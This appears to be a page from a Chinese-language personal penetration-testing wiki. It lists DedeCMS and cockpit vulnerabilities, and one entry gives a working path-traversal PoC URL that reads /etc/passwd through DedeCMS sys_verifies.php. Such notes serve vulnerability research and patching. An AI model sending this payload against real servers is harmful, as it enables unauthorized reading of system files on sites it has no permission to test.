跳到主要内容

BananaYH wiki

🏡Home 📗Wiki 👨🏻‍💻Github

Home
随记
速查表
免杀
漏洞库
- AC
- ALLin
web
漏洞复现
CVE
Window提权
Window权限维持
Linux提权
Linux权限维持
内网渗透
域渗透
Tool
other

DeDecms接口sys_verifies.php存在任意文件读取漏洞

需前台注册用户权限。

poc

http://ip/dede/sys_verifies.php?action=view&filename=../../../../../etc/passwd

cockpit系统upload接口存在文件上传漏洞

DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞

poc

Copyright © 2024 bananaYH, Inc.